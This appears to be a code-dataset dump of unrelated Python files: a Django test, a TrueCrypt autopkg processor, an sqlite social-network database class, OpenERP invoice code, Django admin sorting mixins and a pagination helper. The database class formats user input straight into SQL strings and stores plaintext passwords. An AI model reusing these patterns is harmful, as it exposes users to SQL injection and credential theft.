op.add_column(u'results', sa.Column('query_id', sa.Integer(), nullable=True))
op.add_column(u'results', sa.Column('result_url', sa.String(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column(u'results', 'result_url')
op.drop_column(u'results', 'query_id')
op.drop_table('queries')
### end Alembic commands ###
| mpl-2.0 | 6,663,940,205,437,048,000 | 28.8 | 82 | 0.680729 | false | 3.249221 | false | false | false |
deadlylaid/book_connect | wef/items/tests/booksale.py | 1 | 1589 | from django.core.urlresolvers import resolve
from django.test import TestCase
from items.models.item_post import ItemPost
from wef.views import Home
from items.views.booksale import BookSale
from wef.mixins.tests import SetUpLogInMixin
class BookSalePageTest(SetUpLogInMixin):
    def test_booksale_url_resolves_to_booksale_view(self):
found = resolve('/booksale/')
self.assertEqual(found.func.__name__, BookSale.__name__)
def test_booksale_page_template(self):
response = self.client.get('/booksale/')
self.assertTemplateUsed(response, 'items/booksale.html')
class NewBookSaleTest(SetUpLogInMixin):
def test_client_post_books(self):
send_post_data_post = self.client.post(
'/booksale/',
data={
'title': '책 팝니다',
'book': ['book1', 'book2'],
'price': ['1000', '2000'],
}
)
new_post = ItemPost.objects.first()
self.assertEqual(new_post.title, '책 팝니다')
send_post_price_is_null_data = self.client.post(
'/booksale/',
data={
'title': '책팜2',
'book': ['book1', 'book2'],
'price': ['가격미정', '2000'],
'is_price_null': ['True', 'True'],
}
)
second_post = ItemPost.objects.last()
self.assertEqual(second_post.title, '책팜2')
self.assertEqual(second_post.booklist_set.first().bookprice, 0)
| mit | -7,484,518,541,001,545,000 | 29.529412 | 71 | 0.550417 | false | 3.663529 | true | false | false |
paulsuh/paul-suh-recipes | TrueCrypt/TrueCryptURLProvider.py | 1 | 2381 | #!/usr/bin/env python
import re
import urllib
import urllib2
from autopkglib import Processor, ProcessorError
__all__ = ["TrueCryptURLProvider"]
DLV_URL = 'http://www.truecrypt.org/downloads'
DLS_URL = 'http://www.truecrypt.org/dl'
re_verfind = re.compile('<input type="hidden" name="DownloadVersion" value="([0-9A-Za-z\.]*)">')
class TrueCryptURLProvider(Processor):
'''Provides URL to the latest TrueCrypt installer DMG.'''
input_variables = {
}
output_variables = {
'url': {
'description': 'URL to the latest download',
},
'truecrypt_version': {
'description': 'Version number',
}
}
description = __doc__
def get_version(self):
try:
f = urllib2.urlopen(DLV_URL)
content = f.read()
f.close()
except BaseException as e:
raise ProcessorError('Could not retrieve URL: %s' % DLV_URL)
m = re_verfind.search(content)
if m:
return m.group(1)
raise ProcessorError('No version found')
def get_url(self, version):
'''Get the URL of the TrueCrypt DMG
The TrueCrypt website has an HTML form that, when POSTed, returns
a 302 redirect to the actual DMG download. Handle all of that, as
ugly as it is, using urllib2.
'''
# no easy way to *not* follow redirects with urllib2, so do this
class NoRedirectHandler(urllib2.HTTPRedirectHandler):
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
pass
submit_form = {
'DownloadVersion': version,
'MacOSXDownload': 'Download',
}
try:
req = urllib2.Request(DLS_URL, urllib.urlencode(submit_form))
opener = urllib2.build_opener(NoRedirectHandler)
f = opener.open(req)
content = f.read()
f.close()
except BaseException as e:
if isinstance(e, urllib2.HTTPError) and e.code == 302:
url = e.headers['Location']
else:
raise ProcessorError('Could not retrieve URL: %s' % DLS_URL)
# hack to re-assemble URL with urlencoded filename part
url_split = url.split('/')
new_url = '/'.join(url_split[0:3]) + '/'
new_url += urllib.pathname2url('/'.join(url_split[3:]))
return new_url
def main(self):
self.env['truecrypt_version'] = self.get_version()
self.output('Version: %s' % self.env['truecrypt_version'])
self.env['url'] = self.get_url(self.env['truecrypt_version'])
self.output('URL: %s' % self.env['url'])
if __name__ == '__main__':
processor = TrueCryptURLProvider()
processor.execute_shell()
| apache-2.0 | 8,546,031,501,821,073,000 | 24.063158 | 96 | 0.672827 | false | 3.010114 | false | false | false |
tur103/social-network | server/database.py | 1 | 11888 | """
Author : Or Israeli
FileName : database.py
Date : 5.5.17
Version : 1.0
"""
import sqlite3
from constants import *
import os
class DataBase(object):
def __init__(self, path):
object.__init__(self)
self.database = sqlite3.connect(path)
def create_database(self):
"""
The function creates a new users database table.
"""
self.database.execute('''create table user(username text primary key
not null, password text unique not null, email
text unique not
null, online int not null);''')
def drop_database(self):
"""
The function deletes the users database table.
"""
self.database.execute("drop table if exists user")
def create_friends_database(self):
"""
The function creates a new friends database table.
"""
self.database.execute('''create table friends(user text primary key
not null);''')
def drop_friends_database(self):
"""
The function deletes the friends database table.
"""
self.database.execute("drop table if exists friends")
def create_requests_database(self):
"""
The function creates a new requests database table.
"""
self.database.execute('''create table requests(user text primary key
not null);''')
def drop_requests_database(self):
"""
The function deletes the requests database table.
"""
self.database.execute("drop table if exists requests")
def create_chat_database(self):
"""
The function creates a new chat database table.
"""
self.database.execute('''create table chat(too text not null,
frm text not null, message text not null);''')
def drop_chat_database(self):
"""
The function deletes the chat database table.
"""
self.database.execute("drop table if exists chat")
def add_message(self, to, frm, message):
"""
The function adds a new message to the chat table.
Args:
to (string): The addressee of the message.
frm (string): The sender of the message.
message (string): The body of the message.
"""
self.database.execute("insert into chat (too, frm, message) "
"values ('%s', '%s', '%s')" % (to, frm,
message))
self.database.commit()
def get_message(self, to):
"""
The function finds all the messages that were sent to the user,
returns them and deletes them from the chat database.
Args:
to (string): The username of the user.
Returns:
list: The list of the messages that were sent to the user.
"""
cursor = self.database.execute("select too, frm, message from chat")
messages_list = []
for row in cursor:
if row[0] == to:
messages_list.append((row[0], row[1], row[2]))
try:
self.database.execute("delete from chat where too = '%s'" % to)
self.database.commit()
except sqlite3.IntegrityError:
pass
return messages_list
def get_requests(self):
"""
The function returns all the friendship requests that were sent
to the user.
Returns:
list: The list of the friendship requests.
"""
cursor = self.database.execute("select user from requests")
requests = []
for raw in cursor:
requests.append(raw[0])
return requests
def get_friends(self):
"""
The function returns all the friends of the user.
Returns:
list: The list of the friends.
"""
cursor = self.database.execute("select user from friends")
friends = []
for raw in cursor:
friends.append(raw[0])
return friends
def delete_request(self, user):
"""
The function deletes a friendship request that was sent
to the user by another user.
Args:
user (string): The user that sent the friendship request.
Returns:
bool: If the request was deleted or not.
"""
requests_list = self.get_requests()
if user in requests_list:
self.database.execute("delete from requests where user = '%s'"
% user)
self.database.commit()
return True
else:
return False
def add_friend(self, user):
"""
The function adds a new friend to the user's database.
Args:
user (string): The user that join to the friends list.
"""
self.database.execute("insert into friends (user) values ('%s')"
% user)
self.database.commit()
def add_request(self, user):
"""
The function adds a new request to the user's database.
Args:
user (string): The user that sent the friendship request.
Returns:
bool: If the request was added or not.
"""
try:
self.database.execute("insert into requests (user) values ('%s')"
% user)
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def add_user(self, credentials):
"""
The function adds a new user to the social network.
It gets his credentials and registers him.
Args:
credentials (list): List of the 3 credentials
(username, password and email address).
Returns:
            bool: If the registration was successful or not.
"""
username = credentials[0]
password = credentials[1]
email = credentials[2]
if not username or not password or not email:
return False
try:
self.database.execute("insert into user (username, password, "
"email, online) values ('%s', '%s', '%s', "
"1)" % (username, password, email))
self.database.commit()
os.mkdir(DIRECTORY + username)
return True
except sqlite3.IntegrityError:
return False
def update_user(self, username, value):
"""
The function turns the user's status from online to offline
or from offline to online.
Args:
username (string): The user that want to change his status.
value (int): Online or Offline (1 or 0).
"""
if value == CHANGE:
onof = self.check_online(username)
if onof == 1:
value = 0
if onof == 0:
value = 1
else:
value = int(value)
self.database.execute("update user set online = %s where "
"username='%s'" % (value, username))
self.database.commit()
def check_user(self, credentials):
"""
The function checks if the user's credentials are correct when
he wants to log in.
Args:
credentials (list): List of the 2 credentials
(username and password).
Returns:
bool: If the user's credentials are correct or not.
"""
username = credentials[0]
password = credentials[1]
cursor = self.database.execute("select username, password from user")
for raw in cursor:
if raw[0] == username and not self.check_online(username):
if raw[1] == password:
self.update_user(username, 1)
return True
else:
return False
def get_users(self):
"""
        The function returns all the users that exist in the
server's database.
Returns:
list: The list of all the user names.
"""
cursor = self.database.execute("select username from user")
usernames_list = []
for raw in cursor:
usernames_list.append(raw[0])
return usernames_list
def delete_user(self, username):
"""
The function deletes a user from the social network.
Args:
username (string): The username of the user.
"""
self.database.execute("delete from user where username = %s" %
username)
self.database.commit()
def check_online(self, username):
"""
The function checks if the user is online or offline.
Args:
username (string): The username of the user.
Returns:
int: If the user is online or offline (1 or 0).
"""
cursor = self.database.execute("select username, online from user")
for raw in cursor:
if raw[0] == username:
return raw[1]
def change_email(self, username, email):
"""
The function changes the email address of the user.
Args:
            username (string): The username of the user that wants to change
his email address.
email (string): The new email address.
Returns:
            bool: If the email address was changed or not.
"""
try:
self.database.execute("update user set email = '%s' "
"where username = '%s'" % (email, username))
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def change_password(self, username, password):
"""
The function changes the password of the user.
Args:
            username (string): The username of the user that wants to change
his password.
password (string): The new password.
Returns:
            bool: If the password was changed or not.
"""
try:
self.database.execute("update user set password = '%s' "
"where username = '%s'" % (password,
username))
self.database.commit()
return True
except sqlite3.IntegrityError:
return False
def get_email(self, username):
"""
The function returns the email address of the received user.
Args:
username (string): The username to get his email address.
Returns:
string: The email address of the user.
"""
cursor = self.database.execute("select username, email from user")
for raw in cursor:
if raw[0] == username:
return raw[1]
def get_password(self, username, email):
"""
The function returns the password of the received user.
Args:
username (string): The username to get his password.
email (string): The email address of the user.
Returns:
string: The password of the user.
"""
cursor = self.database.execute("select username, email, password "
"from user")
for raw in cursor:
if raw[0] == username and raw[1] == email:
return raw[2]
return False
def close_database(self):
"""
The function closes the database.
"""
self.database.close()
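# A short usage sketch of the friendship flow implemented above (illustrative
# names; assumes the requests and friends tables were created first with
# create_requests_database() and create_friends_database()):
#
#   db = DataBase('server.db')
#   db.add_request('alice')        # 'alice' sent a friendship request
#   db.get_requests()              # -> ['alice']
#   if db.delete_request('alice'): # accept the request...
#       db.add_friend('alice')     # ...and move her to the friends table
#   db.get_friends()               # -> ['alice']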
| mit | 8,901,477,501,509,801,000 | 26.971765 | 78 | 0.527338 | false | 4.978224 | false | false | false |
thinkasoft/ProyectoRD-dev | l10n_ve_imex/model/invoice.py | 1 | 8350 | # -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (c) 2013 Vauxoo C.A. (http://openerp.com.ve/)
# All Rights Reserved
############# Credits #########################################################
# Coded by: Juan Marzquez (Tecvemar, c.a.) <[email protected]>
# Katherine Zaoral <[email protected]>
# Planified by:
# Juan Marquez <[email protected]>
# Humberto Arocha <[email protected]>
# Audited by: Humberto Arocha <[email protected]>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
from openerp.osv import osv, fields
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
class account_invoice(osv.osv):
_inherit = "account.invoice"
def _get_imex_invoices(self, cr, uid, ids, name, args, context=None):
context = context or {}
ids = isinstance(ids, (int, long)) and [ids] or ids
res = {}.fromkeys(ids, False)
for inv in self.browse(cr, uid, ids, context={}):
for ait in inv.imex_tax_line:
res[inv.id] = ait.cfl_id.customs_form_id.id
return res
def _get_inv_from_ait(self, cr, uid, ids, context=None):
'''
Returns
'''
context = context or {}
ids = isinstance(ids, (int, long)) and [ids] or ids
ait_obj = self.pool.get('account.invoice.tax')
ait_brw = ait_obj.browse(cr, uid, ids, context=context)
return list(set([i.invoice_id.id for i in ait_brw if i.imex_inv_id]))
_columns = {
'customs_form_id': fields.function(
_get_imex_invoices, method=True,
type='many2one', relation='customs.form',
string='Customs form',
store={
'account.invoice.tax':(_get_inv_from_ait, ['imex_inv_id'], 50),
}, help="This is the VAT Withholding Document where this invoice is being withheld"),
'imex_tax_line': fields.one2many(
'account.invoice.tax', 'imex_inv_id', 'Vat lines', readonly=True,
attrs="{'readonly':[('vat_detail','=',True)], \
'required':[('vat_detail','=',True)]}",),
'expedient':fields.boolean('Dossier',
help="If it is true, it means this is a \
                                   landing form, you will need to load this \
                                   format as a purchase invoice to declare it \
                                   in the Book"),
}
def on_change_customs_form_id(self, cr, uid, ids, customs_form_id, context=None):
context = context or {}
res = {}
if customs_form_id:
imp = self.pool.get('customs.form').browse(cr, uid,
customs_form_id,
context=context)
res = {'value': {'num_import_form': imp.name,
'import_invo': imp.date_liq}}
return res
def test_open(self, cr, uid, ids, *args):
so_brw = self.browse(cr, uid, ids, context={})
for item in so_brw:
if item.customs_form_id and \
item.customs_form_id.state in ('draft', 'cancel'):
raise osv.except_osv(_('Error!'), _(
                    'Can\'t validate an invoice while the form 86 state is \
cancel or draft (%s).\nPlease validate the form 86 first.')
% item.customs_form_id.name)
return super(account_invoice, self).test_open(cr, uid, ids, args)
class account_invoice_tax(osv.osv):
_inherit = 'account.invoice.tax'
_columns = {
'cfl_id': fields.many2one('customs.form.line',
'Vat line',
ondelete='cascade'),
'imex_inv_id': fields.many2one('account.invoice', 'Imex Invoice',
ondelete='cascade', select=True),
'partner_id': fields.related('imex_inv_id', 'partner_id',
type='many2one', relation='res.partner',
string='Supplier',store=False, readonly=True),
'supplier_invoice_number': fields.related('imex_inv_id', 'supplier_invoice_number', type='char',
string='Invoice ref', size=64, store=False,
readonly=True),
}
_defaults = {
}
#~ _sql_constraints = [
#~ ('base_gt_zero', 'CHECK (base>0)',
#~ 'The base amount must be > 0!'),
#~ ('amount_zero', 'CHECK (amount>=0)',
#~ 'The tax amount must be >= 0!'),
#~ ]
#~ def on_change_cfl_id(self, cr, uid, ids,
#~ cfl_id):
#~ '''
#~ Create a domain to filter invoice_id for invoices listed in
#~ customs_form.invoice_ids only
#~ http://help.openerp.com/question/11180/how-to-create-a-domain-for-
#~ field-in-parentparent-model/
#~ '''
#~ res = {}
#~ if cfl_id:
#~ line_obj = self.pool.get('customs.form.line')
#~ invoices = [i.id for i in line_obj.browse(
#~ cr, uid, cfl_id).customs_form_id.invoice_ids]
#~ res = {'domain': {'invoice_id': [('id','in',invoices)]}}
#~ return res
def on_change_amount(self, cr, uid, ids, tax_id, base_amount, tax_amount,
context=None):
""" To autocompute base or tax, only for percent based taxes. """
context = context or {}
res = {}
if tax_id:
obj_vat = self.pool.get('account.tax')
vat = obj_vat.browse(cr, uid, tax_id, context=context)
if vat.type == 'percent':
if base_amount == 0 and tax_amount > 0:
base_amount = round(tax_amount / vat.amount, 2)
res = {'value': {'base_amount': base_amount,
'tax_amount': tax_amount}}
if base_amount > 0 and tax_amount == 0:
res = {'value': {'base_amount': 0.0,
'tax_amount': tax_amount}}
return res
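    # Worked example for the autocompletion above (illustrative figures): with a
    # percent-type tax of 12% (vat.amount == 0.12), entering tax_amount = 120.0
    # against a zero base fills base_amount = round(120.0 / 0.12, 2) = 1000.0.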
def on_change_invoice_id(self, cr, uid, ids, invoice_id, context=None):
context = context or {}
rp_obj = self.pool.get('res.partner')
res = {}
if invoice_id:
obj_inv = self.pool.get('account.invoice')
inv_brw = obj_inv.browse(cr, uid, invoice_id, context=context)
acc_part_brw = rp_obj._find_accounting_partner(inv_brw.partner_id)
res = {'value': {'partner_id': acc_part_brw.id,
'supplier_invoice_number': inv_brw.supplier_invoice_number}}
return res
def on_change_tax_id(self, cr, uid, ids, tax_id, context=None):
context = context or {}
res = {}
if tax_id:
at_obj = self.pool.get('account.tax')
tax_brw = at_obj.browse(cr, uid, tax_id, context=context)
if tax_brw:
res = {'value': {'account_id': tax_brw.account_collected_id.id,
'name': tax_brw.name}}
else:
res = {'value': {'account_id': False, 'name': False}}
return res
| agpl-3.0 | 4,054,325,678,371,464,000 | 44.380435 | 104 | 0.502156 | false | 3.914674 | false | false | false |
ourway/marmoolak | setup.py | 1 | 1727 | import glob
import imp
import io
import os
from os import path
from setuptools import setup, find_packages, Extension
import sys
MYDIR = path.abspath(os.path.dirname(__file__))
# NOTE
REQUIRES = ['fysom', 'redis']
cmdclass = {}
ext_modules = []
setup(
name='marmoolak',
version='1.0.7',
description='Yet another finite state machine with memory and callbacks.',
long_description=io.open('README.rst', 'r', encoding='utf-8').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Natural Language :: English',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Topic :: Software Development :: Libraries :: Python Modules',
'Programming Language :: Python',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Programming Language :: Python :: Implementation :: Jython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
],
keywords='fsm workflow engine disk memory easy simple iran tehran',
author='Farsheed Ashouri',
author_email='[email protected]',
url='https://github.com/ourway/marmoolak',
license='Apache 2.0',
packages=find_packages(exclude=['tests']),
include_package_data=True,
zip_safe=False,
install_requires=REQUIRES,
setup_requires=[],
cmdclass=cmdclass,
ext_modules=ext_modules,
test_suite='nose.collector',
)
| mit | 8,931,730,525,621,194,000 | 31.584906 | 78 | 0.645049 | false | 4.092417 | false | false | false |
YiqunPeng/Leetcode-pyq | solutions/655PrintBinaryTree.py | 1 | 1788 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
layers = self.bfs(root)
height = len(layers)
ans = [['']*(2**height-1) for i in xrange(height)]
        # Column index available to each node of the bottom layer.
        positions = [i for i in xrange(0, 2**height-1, 2)]
        for i in xrange(height-1, -1, -1):
            for j in xrange(0, len(positions)):
                if layers[i][j]:
                    ans[i][positions[j]] = str(layers[i][j].val)
            # Each parent sits midway between the columns of its two children.
            new_pos = [(positions[k] + positions[k+1]) / 2 for k in xrange(0, len(positions) - 1, 2)]
            positions = new_pos
return ans
def bfs(self, root):
layers = [[root]]
next_layer = layers[-1]
while next_layer:
nodes = []
for node in next_layer:
if not node:
nodes.append(None)
nodes.append(None)
continue
if node.left:
nodes.append(node.left)
else:
nodes.append(None)
if node.right:
nodes.append(node.right)
else:
nodes.append(None)
flag = 0
for node in nodes:
if node:
flag = 1
break
if flag:
layers.append(nodes)
next_layer = layers[-1]
else:
next_layer = []
return layers
| gpl-3.0 | -7,238,612,738,662,014,000 | 28.816667 | 92 | 0.409955 | false | 4.267303 | false | false | false |
benzkji/django-admin-sort | admin_sort/admin/inlines.py | 1 | 5445 | from __future__ import unicode_literals
from django import forms
from django.conf import settings
from django.contrib import admin
from django.core.exceptions import ImproperlyConfigured
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
class SortableInlineMixinBase(object):
# formset = CustomInlineFormSet
_field = None
def __init__(self, *args, **kwargs):
self._field = getattr(self, 'position_field', None)
if not self._field:
msg = _('You have to define a position field on {}').format(
self.__class__.__name__
)
raise ImproperlyConfigured(msg)
if isinstance(self, admin.StackedInline):
self.is_stacked = True
self.is_tabular = False
elif isinstance(self, admin.TabularInline):
self.is_stacked = False
self.is_tabular = True
else:
msg = (
'Class {0}.{1} must also derive from'
' admin.TabularInline or admin.StackedInline'
).format(self.__module__, self.__class__)
raise ImproperlyConfigured(msg)
super(SortableInlineMixinBase, self).__init__(*args, **kwargs)
@property
def template(self):
return 'admin/admin_sort/edit_inline/inline.html'
@property
def html_data_fields(self):
data_fields = getattr(
super(SortableInlineMixinBase, self),
'html_data_fields',
''
)
my_data_fields = {
'admin-sort-position-field': 'field-%s' % self._field
}
data_fields_out = ''
for key, value in my_data_fields.items():
data_fields_out += ' data-{}="{}"'.format(key, value)
return mark_safe('{} {}'.format(data_fields, data_fields_out))
@property
def css_classes(self):
css_classes = getattr(
super(SortableInlineMixinBase, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-inline'
if self.is_tabular:
my_css_classes += ' admin-sort-tabular'
else:
my_css_classes += ' admin-sort-stacked'
if self.extra > 0:
my_css_classes += ' has-extra admin-sort-has-extra'
return '{} {}'.format(css_classes, my_css_classes)
class DragAndDropSortableInlineMixin(SortableInlineMixinBase):
@property
def media(self):
css = {
'all': ['admin_sort/css/sortable.inline.css'],
}
if 'djangocms_admin_style' in settings.INSTALLED_APPS:
css['all'].append('admin_sort/css/sortable.inline.cms.css')
js = (
'admin/js/jquery.init.js',
'admin_sort/js/sortable.js',
'admin_sort/js/sortable.draganddrop.inline.js',
)
original_media = super(DragAndDropSortableInlineMixin, self).media
# return original_media
return original_media + forms.widgets.Media(css=css, js=js)
@property
def css_classes(self):
css_classes = getattr(
super(DragAndDropSortableInlineMixin, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-draganddrop-inline'
return '{} {}'.format(css_classes, my_css_classes)
def get_formset(self, request, obj=None, **kwargs):
formset = super(DragAndDropSortableInlineMixin, self).get_formset(
request,
obj,
**kwargs
)
# needed for extra > 0
formset.form.base_fields[self._field].required = False
# hide it
formset.form.base_fields[self._field].widget = forms.HiddenInput(
attrs={'class': 'admin-sort-position'}
)
return formset
class SortableInlineAdminMixin(DragAndDropSortableInlineMixin):
# deprecated!
pass
class DropdownSortableInlineMixin(SortableInlineMixinBase):
@property
def media(self):
js = [
'admin/js/jquery.init.js',
'admin_sort/js/sortable.dropdown.inline.js',
]
original_media = super(DropdownSortableInlineMixin, self).media
# return original_media
return original_media + forms.widgets.Media(js=js)
@property
def css_classes(self):
css_classes = getattr(
super(DropdownSortableInlineMixin, self),
'css_classes',
''
)
my_css_classes = 'admin-sort-dropdown-inline'
return '{} {}'.format(css_classes, my_css_classes)
def get_formset(self, request, obj=None, **kwargs):
formset = super(DropdownSortableInlineMixin, self).get_formset(
request,
obj,
**kwargs
)
# needed for extra > 0
formset.form.base_fields[self._field].required = False
# prepare widget ARF!
# import pprint
# pprint.pprint(self.__dict__)
# pprint.pprint(self.opts.__dict__)
# pprint.pprint(formset.__dict__)
# pprint.pprint(formset.form)
# TODO: getting count of existing inlines, this is done in js otherwise!
# count = self.model.objects....count()
# choices = [(no, no, ) for no in range(1, count)]
formset.form.base_fields[self._field].widget = forms.Select(
attrs={'class': 'admin-sort-position'},
# choices=choices
)
return formset
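# A minimal usage sketch (assumed project code, not part of this module): mix one
# of the classes above into a regular Django inline and point position_field at
# an integer field on the inlined model.
#
#   class ChapterInline(DragAndDropSortableInlineMixin, admin.TabularInline):
#       model = Chapter               # hypothetical model with a "position" field
#       position_field = 'position'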
| mit | 7,148,667,015,688,821,000 | 32.20122 | 80 | 0.5809 | false | 4.036323 | false | false | false |
yola/demands | demands/pagination.py | 1 | 5015 | from itertools import count
PAGE_PARAM = 'page_param'
PAGE_SIZE_PARAM = 'page_size_param'
PAGE_SIZE = 'page_size'
PAGINATION_TYPE = 'pagination_type'
RESULTS_KEY = 'results_key'
NEXT_KEY = 'next_key'
START = 'start'
class PaginationType(object):
ITEM = 'item'
PAGE = 'page'
class PaginatedResults(object):
"""Paginated API results
    Returns an iterable container of items from a paginated function, useful
for service methods that return paginated results.
The paginated function should accept a page and page size argument and
return a page of results for those arguments nested in a 'results' key:
>>> def numbers(page, page_size):
... start = (page - 1) * page_size
... end = start + page_size
... return {'results': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(numbers)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
The names of these arguments, the value for `page_size`, the starting page
    number (which defaults to page 1), and the results key can be overridden
through the init of the class:
>>> def numbers(offset, length):
... start = offset * length # expects start of 0
... end = start + length
... return {'numbers': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(
... numbers, page_param='offset', page_size_param='length',
... page_size=10, results_key='numbers', start=0)
>>> [n for n in results]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
If your function returns the results as a top-level list, set the
`results_key` to `None`.
>>> def numbers(page, page_size):
... start = (page - 1) * page_size
... end = start + page_size
... return range(0, 100)[start:end]
...
>>> results = PaginatedResults(numbers, results_key=None)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
The `pagination_type` configuration defines how the api behaves, by
default this is set to `PaginationType.PAGE` which means the API should
expect the `page_param` to represent the index of the page to return.
Set this value to `PaginationType.ITEM` if the API expects `page_param` to
represent the index of an item.
>>> def numbers(offset, limit):
... start = offset
... end = start + limit
... return {'results': range(0, 100)[start:end]}
...
>>> results = PaginatedResults(
... numbers, page_param='offset', page_size_param='limit',
... pagination_type=PaginationType.ITEM)
>>> list(results)
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, ... 99]
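
    Iteration also stops early when the API marks the last page explicitly: if a
    page dict contains the key named by `next_key` ('next' by default) with a
    value of None, no further pages are requested even when the page is full.
    For example (a sketch with a made-up paginated function):

    >>> def numbers(page, page_size):
    ...     start = (page - 1) * page_size
    ...     end = start + page_size
    ...     return {'results': range(0, 100)[start:end],
    ...             'next': page + 1 if end < 100 else None}
    ...
    >>> results = PaginatedResults(numbers, page_size=20)
    >>> len(list(results))
    100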
"""
DEFAULT_OPTIONS = {
PAGE_PARAM: 'page',
PAGE_SIZE_PARAM: 'page_size',
PAGE_SIZE: 100,
PAGINATION_TYPE: PaginationType.PAGE,
RESULTS_KEY: 'results',
NEXT_KEY: 'next',
}
def __init__(self, paginated_fn, args=(), kwargs=None, **options):
self.paginated_fn = paginated_fn
self.args = args
self.kwargs = kwargs or {}
self.options = dict(self.DEFAULT_OPTIONS)
self.options.update(options)
def __iter__(self):
for page_id in self._page_ids():
page = self._get_page(page_id)
for item in page.items:
yield item
if page.is_last_page:
return
def _get_page(self, page):
kwargs = dict(self.kwargs)
kwargs.update({
self.options[PAGE_PARAM]: page,
self.options[PAGE_SIZE_PARAM]: self.options[PAGE_SIZE],
})
one_page_data = self.paginated_fn(*self.args, **kwargs)
return Page(one_page_data, self.options)
def _page_ids(self):
if self.options[PAGINATION_TYPE] == PaginationType.PAGE:
start = self.options.get(START, 1)
return count(start)
if self.options[PAGINATION_TYPE] == PaginationType.ITEM:
start = self.options.get(START, 0)
return count(start, self.options[PAGE_SIZE])
raise ValueError('Unknown pagination_type')
class Page(object):
def __init__(self, data, options):
self._data = data
self._options = options
@property
def items(self):
results_key = self._options.get(RESULTS_KEY)
if results_key:
return self._data[results_key]
return self._data
@property
def size(self):
return len(self.items)
@property
def is_last_page(self):
next_key = self._options.get(NEXT_KEY)
next_page_is_null = (
next_key in self._data and
self._data[next_key] is None
)
return self.size < self._options[PAGE_SIZE] or next_page_is_null
| mit | -8,171,778,497,806,336,000 | 32.885135 | 78 | 0.569292 | false | 3.618326 | false | false | false |